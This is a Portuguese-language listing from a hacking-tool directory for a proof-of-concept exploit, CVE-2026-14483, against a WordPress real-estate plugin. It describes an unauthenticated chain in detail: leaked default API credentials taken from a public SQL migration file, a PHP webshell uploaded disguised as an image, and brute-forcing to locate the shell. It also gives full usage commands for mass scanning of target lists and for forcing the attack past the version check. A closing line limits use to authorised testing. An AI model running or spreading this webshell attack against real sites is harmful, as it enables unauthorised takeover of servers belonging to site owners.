Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/madexploits/cve-2026-14483
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS

Ver Repositório
12há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-14483 — WPL Real Estate RCE

Execução remota de código não autenticada contra o plugin WordPress Realtyna WPL Real Estate Listing.

Baixar ferramenta
CampoDetalhe
CVECVE-2026-14483
Versão afetada<= 5.2.0
Pluginreal-estate-listing-realtyna-wpl
ImpactoUpload não autenticado de webshell PHP (RCE)
ScriptCVE-2026-14483.py
AutorMADEXPLOITS

Por padrão, o script só explora alvos que executam o WPL 5.2.0. Use --force para ignorar essa verificação.

IMAGEM


Resumo da vulnerabilidade

  1. Vazamento de credenciais — As api_key / api_secret padrão são expostas por meio de um dump público de migração SQL.
  2. Upload não autenticado — Essas credenciais autenticam a API de I/O do WPL (set_property), permitindo que um arquivo PHP personalizado seja enviado como imagem de imóvel.
  3. Descoberta de webshell — A shell enviada fica localizada em wp-content/uploads/WPL/{property_id}/.

Requisitos

root@kitploit:~
pip install requests colorama
  • Python 3.8+
  • Acesso de rede ao(s) alvo(s)

Uso

Lista de alvos

Crie um arquivo de texto com uma URL base por linha:

root@kitploit:~
http://wplab.test
https://example.com

Execução básica

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt

As URLs de shell encontradas são anexadas a result.txt (ou --output).

Opções completas

root@kitploit:~
python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force
ArgumentoPadrãoDescrição
--targets(obrigatório)Arquivo com URLs base (uma por linha)
--outputresult.txtArquivo para anexar as URLs de shell encontradas
--user-id1ID de usuário WordPress / WPL que possui o novo imóvel
--payloadshell de upload integradaString de payload PHP personalizada
--max-id1000ID máximo de imóvel para força bruta ao localizar a shell
--timeout30Timeout HTTP em segundos
--threads5Threads de trabalho concorrentes
--debugdesativadoLog de depuração detalhado
--forcedesativadoExplorar mesmo se a versão ≠ 5.2.0 ou se a versão não puder ser detectada

Fluxo de exploração

root@kitploit:~
Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

Marcador de shell padrão: MADEXPLOITS
Nome de arquivo remoto padrão: 0x89MADEXPLOITS.php


Exemplos

Alvo único de laboratório (neste workspace):

root@kitploit:~
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

Varredura em massa com maior concorrência:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

Forçar exploração quando a verificação de versão falhar:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --force

Saída

root@kitploit:~
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

O result.txt contém uma URL de shell por linha.


Notas

  • A versão é lida de Stable tag: / Version: no readme.txt do plugin, com fallback para wpl.php.
  • Se a shell não for encontrada após o upload, aumente --max-id.
  • Destinado apenas a testes de segurança autorizados / uso em laboratório local.